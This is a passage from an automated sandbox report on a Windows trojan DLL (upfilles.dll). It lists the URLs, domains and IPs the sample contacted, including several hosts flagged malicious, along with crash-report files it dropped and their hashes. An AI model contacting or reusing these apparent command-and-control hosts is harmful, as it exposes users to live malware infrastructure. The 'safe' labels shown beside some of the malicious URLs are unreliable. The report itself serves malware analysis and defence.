                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://api.msn.com/qexplorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjBrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://altynbe.com/api/azureurerundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://altynbe.com/=~rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/nrundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&jrundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://altynbe.com/api/azureprundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://upx.sf.netAmcache.hve.9.drfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              95.164.68.73
                                                                                                              		anikvan.comGibraltar
                                                                                                              		29632NASSIST-ASGItrue
                                                                                                              138.124.183.215
                                                                                                              		altynbe.comNorway
                                                                                                              		8983NOKIA-ASFItrue
                                                                                                              104.21.16.155
                                                                                                              		workspacin.cloudUnited States
                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                              3.69.236.35
                                                                                                              		ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.comUnited States
                                                                                                              		16509AMAZON-02USfalse
                                                                                                              91.194.11.183
                                                                                                              		boriz400.comRussian Federation
                                                                                                              		42994HQservCommunicationSolutionsILtrue
                                                                                                              54.175.181.104
                                                                                                              		ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.comUnited States
                                                                                                              		14618AMAZON-AESUSfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                              Analysis ID:1439879
                                                                                                              Start date and time:2024-05-11 00:03:08 +02:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 7m 12s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:light
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:28
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:1
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:upfilles.dll.dll
                                                                                                              (renamed file extension from exe to dll)
                                                                                                              Original Sample Name:upfilles.dll.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.evad.winDLL@32/17@8/6
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 0
                                                                                                              • Number of non-executed functions: 0

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                              • TCP Packets have been reduced to 100
                                                                                                              • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.20
                                                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • VT rate limit hit for: upfilles.dll.dll

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              00:04:08API Interceptor1500037x Sleep call for process: rundll32.exe modified
                                                                                                              00:04:08API Interceptor1x Sleep call for process: loaddll64.exe modified
                                                                                                              00:04:11API Interceptor4x Sleep call for process: WerFault.exe modified
                                                                                                              00:04:51API Interceptor2619129x Sleep call for process: explorer.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              No context

                                                                                                              Domains

                                                                                                              No context

                                                                                                              ASNs

                                                                                                              No context

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_964e80f5d1a5f925558a7e6299462efecb949df_9db0ef65_6fb130ca-cac1-4736-bec2-e227247d8b1e\Report.wer

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.7695669651831538
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:0SFi/iSyKyosj+4RvNxrfNrQXIDcQOc6ncECcw3l+XaXz+HbHgSQgJjZh88Wpoxf:3ciSyoA80wjIx8jbyzuiFeZ24lO83l
                                                                                                              MD5:F38F1F5A2799280E9AE9ECAED3D4D7F2
                                                                                                              SHA1:614B13F3576A06B0A5D66A28720AD52CD48F64F1
                                                                                                              SHA-256:73EACA5144E5222EA3859908633BE224CDF2CD699D28056A5D123197108AFA1D
                                                                                                              SHA-512:B9504BAE2E55AB063A7D732A66DBD0739F937C3A3F9B1ED05B2C9E54966B1D4A4FF1AF7BF0FA1B5BC023C7BFA404DDCCC9217463CBFCCB67275A9DBB3F848250
                                                                                                              Malicious:false
                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.8.7.5.7.2.1.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.9.1.1.6.5.9.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.b.1.3.0.c.a.-.c.a.c.1.-.4.7.3.6.-.b.e.c.2.-.e.2.2.7.2.4.7.d.8.b.1.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.f.0.0.0.3.c.-.c.f.1.a.-.4.8.1.3.-.9.0.a.4.-.5.5.b.6.8.a.f.9.f.4.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.u.p.f.i.l.l.e.s...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.7.8.-.0.0.0.1.-.0.0.1.4.-.8.e.2.1.-.0.7.f.b.2.5.a.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_964e80f5d1a5f925558a7e6299462efecb949df_9db0ef65_d9b8934c-437b-450d-af46-0185962b24b1\Report.wer

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.7695284270582192
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:DgFPd/ifyKyOsj+4RvNxrfNrQXIDcQOc6ncECcw3l+XaXz+HbHgSQgJjZh88Wpo3:s11ifyOA80wjIx8jbyzuiFeZ24lO83D
                                                                                                              MD5:2A79D4F0CC409452333A8DDF84450AEF
                                                                                                              SHA1:512CBEAAAC2972AE331C435F33652DABEA99A541
                                                                                                              SHA-256:3B527751CA5679B2B05D430B17ADDE2A98AFCC30216D6AA11E58AFF116A824B0
                                                                                                              SHA-512:9B02987593193A773237874A8B64ED4910787AF41B8B8ABCCC5DBA27DF4A1CFE6DC316B2342075BCB51ADB9B0D7033C8AEE7CBCC8867DFD0860E46D5A3FFF0A6
                                                                                                              Malicious:false
                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.5.2.8.4.4.3.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.5.5.9.6.9.2.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.b.8.9.3.4.c.-.4.3.7.b.-.4.5.0.d.-.a.f.4.6.-.0.1.8.5.9.6.2.b.2.4.b.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.7.5.8.8.6.c.-.1.e.1.4.-.4.9.7.7.-.a.4.1.a.-.1.2.a.6.4.d.0.0.c.9.b.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.u.p.f.i.l.l.e.s...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.7.4.-.0.0.0.1.-.0.0.1.4.-.9.1.1.3.-.3.8.f.9.2.5.a.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_dc8a9dd96bb43aa654aa29aa9f464ac6a31131f_9db0ef65_7dc7f057-dc81-4d91-9caa-bd8701d223a3\Report.wer

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.7695293488830603
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:CcxgFF3/iOyKyZsj+4RvNxrfKQXIDcQOc6ncETcw3CCXaXz+HbHgSQgJjZh88Wp8:FgviOyZK0wjpFjbyzuiFeZ24lO83
                                                                                                              MD5:02C2AE579A388FFA4C5C6A5104F49832
                                                                                                              SHA1:0C660AE3539AE95EDF65C53088E9DA7EB5DFFEC9
                                                                                                              SHA-256:C313D051688A264AD7778F15CEC6ECB0D2FA908EA92D9134E25ED80B3B43C826
                                                                                                              SHA-512:A0A17281B979ACB45169A5C79673EC67EEC58F73B21E9D325CE34BD1630D7DBF459BF7AA4DCCE803D8D4842130BCD62AEE4F3822E8A75FA2770905BD285D0830
                                                                                                              Malicious:false
                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.8.5.5.9.7.4.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.8.9.9.7.2.4.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.c.7.f.0.5.7.-.d.c.8.1.-.4.d.9.1.-.9.c.a.a.-.b.d.8.7.0.1.d.2.2.3.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.5.f.a.4.a.6.-.8.4.c.8.-.4.1.2.c.-.b.8.1.1.-.e.9.d.8.7.2.5.2.d.c.7.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.u.p.f.i.l.l.e.s...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.6.8.-.0.0.0.1.-.0.0.1.4.-.0.4.1.7.-.0.6.f.b.2.5.a.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_dc8a9dd96bb43aa654aa29aa9f464ac6a31131f_9db0ef65_8641b0ad-46f6-452c-a496-10d58d4ec871\Report.wer

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.7695999953173611
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:TEF1ks0/idyKygsj+4RvNxrfKQXIDcQOc6ncETcw3CCXaXz+HbHgSQgJjZh88Wp8:o3CidygK0wjpFjbyzuiFeZ24lO83
                                                                                                              MD5:F9DA4317B3745718F8A31BB61F06A4F4
                                                                                                              SHA1:9BD89B72FF6CD9493B7343C4A720B403B54D0439
                                                                                                              SHA-256:072151E64254174294A716437E4F986EC8336BAC545EBEA5D71EC5A481A00DBD
                                                                                                              SHA-512:D2E3D37FAB0EB27FDEAA9A17C253B5D225EA96CD53D898A9F7A8A829D2D6B887E0139387DF6CDA03D85A7E2E8595025E08032A65822C12B65E124144B35837AC
                                                                                                              Malicious:false
                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.2.3.7.7.9.6.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.2.7.3.7.3.4.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.4.1.b.0.a.d.-.4.6.f.6.-.4.5.2.c.-.a.4.9.6.-.1.0.d.5.8.d.4.e.c.8.7.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.0.2.e.b.5.a.-.0.8.a.0.-.4.c.3.1.-.b.1.3.9.-.4.4.8.1.7.4.2.9.8.e.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.u.p.f.i.l.l.e.s...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.b.4.-.0.0.0.1.-.0.0.1.4.-.0.d.f.7.-.6.b.f.7.2.5.a.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D40.tmp.dmp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:02 2024, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):66070
                                                                                                              Entropy (8bit):1.5462375465383378
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:5u8hjNE3e2neSVUa52sl4GbfhHoi7M9UUACGcKutR1ZfE0FXtpqgJbqStCSqjWIF:XhjNi2OM+UAtq1ZfNTqgwStCS9ngz
                                                                                                              MD5:677694119DA44E5FEC7BF1C1317E830B
                                                                                                              SHA1:4FEB41E3E2792D4305F3FD66F5EE17E8BFFDA32D
                                                                                                              SHA-256:13C9DE6CF736408ECF3F5D8B186442A3381B005B307FDBD5DCEB114A627866FB
                                                                                                              SHA-512:000B790E53523A6DFE23A290EFD228BFF0E399927D925B880663ED99F0F3E07957C357E346C4976419B62BC34EC43367BE19E3CA39663B65BD3A6E16CDCE2824
                                                                                                              Malicious:false
                                                                                                              Preview:MDMP..a..... ........>f....................................$...............T.......8...........T.......................................p...............................................................................eJ..............Lw......................T............>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DFD.tmp.WERInternalMetadata.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8534
                                                                                                              Entropy (8bit):3.6939797702013397
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:R6l7wVeJqdgkmE6Yo8N4LgmfWP3pry89bU66Wf088m:R6lXJqakmE6YLegmfWPRU6DfR
                                                                                                              MD5:80B9B0AFA9ABA69B9A78557C448086C5
                                                                                                              SHA1:B99101A8A598F674B85334D5F8A0609AC22631E6
                                                                                                              SHA-256:9968C12422E570B5EE4916B7EDF4BC0240E72DE23F62EF10630EC4B1E51814FF
                                                                                                              SHA-512:8D2CBE94CDDBA9C7F4FDD42B91E690533542BB23B8DD38FD258D3CC44585D6C07E12DA68A06CC179B1B8C7D8C3A8F400316A4787D58FB980DD530F34F2BAB469
                                                                                                              Malicious:false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.2.4.<./.P.i.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E1D.tmp.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4777
                                                                                                              Entropy (8bit):4.477202967569579
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwWl8zssJg771I99aWpW8VY+Ym8M4JCNCF0laFtyq85mQCy8ptSTSLd:uIjfqI7+b7VeJilCGT8poOLd
                                                                                                              MD5:5D367A225C41966DC6550185A90DAE6F
                                                                                                              SHA1:101CC4DF6477453EA9552B5AD0EE1273F1599AEA
                                                                                                              SHA-256:E6997AC198F3DBE27F9915E0C4A3CC5E65654C6536885480C9BC6EF40290C190
                                                                                                              SHA-512:EDF7487656C3685EFE40BEAB794203DDBF95DD49E14CA56E27EAC8BD88B5CCE0BFF9C5555D329990288C05738F40CF731B5EE9D15DB3800A90DCA5F80C5D46F8
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER389A.tmp.dmp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:05 2024, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):58190
                                                                                                              Entropy (8bit):1.605256614606473
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:0VrYrCpCzQOMAsu+Qiqwxay+QsK0QRAQh:2E1TpoQi1aZQsK/Rp
                                                                                                              MD5:CAAA37C00D8ECF6FA5FC4FA2A30BD2FA
                                                                                                              SHA1:2F9D061ED037ECE51B72AC937A99813073410435
                                                                                                              SHA-256:ECA00EFCB890B105FA3A548999F1E7A161FD7BDB5ED7B1F2FF2240DF570C41E2
